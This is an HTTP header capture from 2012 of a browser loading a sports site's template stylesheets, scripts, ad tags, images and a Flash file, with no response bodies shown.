Content-Type: text/html
Server: nginx/1.0.15
Last-Modified: Mon, 05 Nov 2012 23:29:41 GMT
Content-Encoding: gzip
Expires: Sun, 18 Nov 2012 01:30:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 18 Nov 2012 01:30:34 GMT
Content-Length: 1216
Connection: keep-alive
Vary: Accept-Encoding
GET /templates/yoo_bigeasy/css/base.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:28 GMT
Etag: &quot;eccae1-88b-4c65267353200&quot;
Accept-Ranges: bytes
Content-Length: 2187
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /cmsimages/cheap-custom-signs-logo.png HTTP/1.1

Host: www.signsonthecheap.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Content-Length: 1870
Server: Microsoft-IIS/7.5
Access-Control-Allow-Origin: *
Date: Sun, 18 Nov 2012 00:45:23 GMT
Cache-Control: public, max-age=4800
Expires: Sun, 18 Nov 2012 02:05:23 GMT
X-Strangeloop: RCache
X-SL-RCache: Cached
GET /clip/js/dbg.vert.js HTTP/1.1

Host: player.athletixnation.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
x-amz-id-2: BlXC60VGhU1zGXbOb7h7FjoCTClT0YjCqPGrGSx7U2dOmS8FxQWnv3NTCcWTONWn
x-amz-request-id: 09EC45AEC93CF423
Date: Sun, 18 Nov 2012 01:30:35 GMT
x-amz-meta-cb-modifiedtime: Tue, 11 Sep 2012 02:07:14 GMT
Last-Modified: Tue, 11 Sep 2012 05:09:07 GMT
Etag: &quot;23c537c899f825f1ce1347f808d93463&quot;
Accept-Ranges: bytes
Content-Length: 5879
Server: AmazonS3
GET /templates/yoo_bigeasy/css/layout.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccaef-ad3-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 2771
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /Shiny%20Nylon%20Arts.swf HTTP/1.1

Host: www.shinynylonarts.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.shinynylonarts.com/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 23 Jun 2009 14:10:40 GMT
Etag: &quot;4d82833-75703-8e355800&quot;
Accept-Ranges: bytes
Content-Length: 481027
X-Powered-By: PleskLin
Connection: close
GET /cache/widgetkit/widgetkit-b4ef40fb.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 15 Nov 2012 17:26:35 GMT
Etag: &quot;f613d3-c9f3-4ce8bf3ecc8c0&quot;
Accept-Ranges: bytes
Content-Length: 51699
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /navigation/css/main.css HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 12 Oct 2012 01:54:45 GMT
Etag: &quot;226b76-353f-4cbd2f8d32340&quot;
Accept-Ranges: bytes
Content-Length: 13631
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/menus.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccae7-1363-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 4963
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=160X600&cwpid=520266&cwwidth=160&cwheight=600&cwpnet=1&cwtagid=66902 HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/getjs.aspx?action=VIEWAD&amp;cwrun=200&amp;cwadformat=160X600&amp;cwpid=520266&amp;cwwidth=160&amp;cwheight=600&amp;cwpnet=1&amp;cwtagid=66902 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Etag: 64260b9d0554e47b33aad47950ff507b7c7477d9
Cache-Control: max-age=60, public, must-revalidate
Content-Encoding: UTF-8
Date: Sun, 18 Nov 2012 01:30:34 GMT
Content-Length: 8938
Connection: keep-alive
Set-Cookie: C2W4=CT; expires=Sun, 16-Dec-2012 01:30:34 GMT; path=/; domain=.contextweb.com cw=cw;Version=1;Comment=;Domain=.contextweb.com;Path=/;Max-Age=10000
GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=520266&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=66901 HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/getjs.aspx?action=VIEWAD&amp;cwrun=200&amp;cwadformat=300X250&amp;cwpid=520266&amp;cwwidth=300&amp;cwheight=250&amp;cwpnet=1&amp;cwtagid=66901 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Etag: 64260b9d0554e47b33aad47950ff507b7c7477d9
Cache-Control: max-age=60, public, must-revalidate
Content-Encoding: UTF-8
Date: Sun, 18 Nov 2012 01:30:34 GMT
Content-Length: 8938
Connection: keep-alive
Set-Cookie: C2W4=CT; expires=Sun, 16-Dec-2012 01:30:34 GMT; path=/; domain=.contextweb.com cw=cw;Version=1;Comment=;Domain=.contextweb.com;Path=/;Max-Age=10000
GET /templates/yoo_bigeasy/css/modules.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccaf0-fa4-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 4004
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /curation/mainhot/thumbimages/gruden%20tennessee.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 15 Nov 2012 11:20:46 GMT
Etag: &quot;791886-a682-4ce86d7a99f80&quot;
Accept-Ranges: bytes
Content-Length: 42626
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /Scripts/widget.js?id=924de7ea-1917-4b16-af38-f7a0a4352145&d=ZmVud2F5d2VzdC5jb20=&wid=1868 HTTP/1.1

Host: api.content.ad
GET /Scripts/widget.js?id=924de7ea-1917-4b16-af38-f7a0a4352145&amp;d=ZmVud2F5d2VzdC5jb20=&amp;wid=1868 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Thu, 02 Aug 2012 00:04:21 GMT
Accept-Ranges: bytes
Etag: &quot;b512335e4270cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 18 Nov 2012 01:29:19 GMT
Content-Length: 2192
GET /templates/yoo_bigeasy/css/tools.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccae0-1f55-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 8021
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /curation/mainhot/thumbimages/oregonmascot.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sat, 17 Nov 2012 01:05:56 GMT
Etag: &quot;791453-10438-4cea67c87a500&quot;
Accept-Ranges: bytes
Content-Length: 66616
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /media/widgetkit/js/jquery.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sun, 05 Aug 2012 20:50:16 GMT
Etag: &quot;ecd230-17421-4c68ae88a3200&quot;
Accept-Ranges: bytes
Content-Length: 95265
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /media/system/js/mootools-core.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 13 Sep 2012 12:09:02 GMT
Etag: &quot;ecd35d-1786a-4c9942c467380&quot;
Accept-Ranges: bytes
Content-Length: 96362
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/system.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccaee-2a68-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 10856
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/extensions.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:28 GMT
Etag: &quot;eccae3-6b4-4c65267353200&quot;
Accept-Ranges: bytes
Content-Length: 1716
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: Apache
Last-Modified: Wed, 31 Oct 2012 21:22:10 GMT
Etag: &quot;87de33-256-4cd617ed12480&quot;
Accept-Ranges: bytes
Content-Length: 598
Date: Sun, 18 Nov 2012 01:30:34 GMT
Connection: keep-alive
GET /curation/mainhot/thumbimages/fehr%20bettmann.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 16 Nov 2012 22:54:40 GMT
Etag: &quot;791452-125dd-4cea4a7156c00&quot;
Accept-Ranges: bytes
Content-Length: 75229
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/custom.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:28 GMT
Etag: &quot;eccaec-a7-4c65267353200&quot;
Accept-Ranges: bytes
Content-Length: 167
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/background/dust.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccb07-11e-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 286
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/font1/chaparral.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:32 GMT
Etag: &quot;eccb15-1fd-4c65267723b00&quot;
Accept-Ranges: bytes
Content-Length: 509
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/font2/leaguegothic.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:32 GMT
Etag: &quot;eccaf3-197-4c65267723b00&quot;
Accept-Ranges: bytes
Content-Length: 407
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/style.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccae5-5e7-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 1511
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/font3/leaguegothic.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:34 GMT
Etag: &quot;eccb19-506-4c6526790bf80&quot;
Accept-Ranges: bytes
Content-Length: 1286
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /curation/mainhot/thumbimages/Tim_Tebow_Announces_Partnership_With_TiVo_-_YouTube.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Wed, 14 Nov 2012 21:40:32 GMT
Etag: &quot;791623-1d933-4ce7b62479400&quot;
Accept-Ranges: bytes
Content-Length: 121139
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /templates/yoo_bigeasy/css/print.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:30 GMT
Etag: &quot;eccaed-1ad-4c6526753b680&quot;
Accept-Ranges: bytes
Content-Length: 429
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /templates/yoo_bigeasy/fonts/leaguegothic.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Sun, 18 Nov 2012 01:30:34 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:38 GMT
Etag: &quot;eccad2-1b3-4c65267cdc880&quot;
Accept-Ranges: bytes
Content-Length: 435
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /curation/mainhot/thumbimages/romar.jpg HTTP/1.1

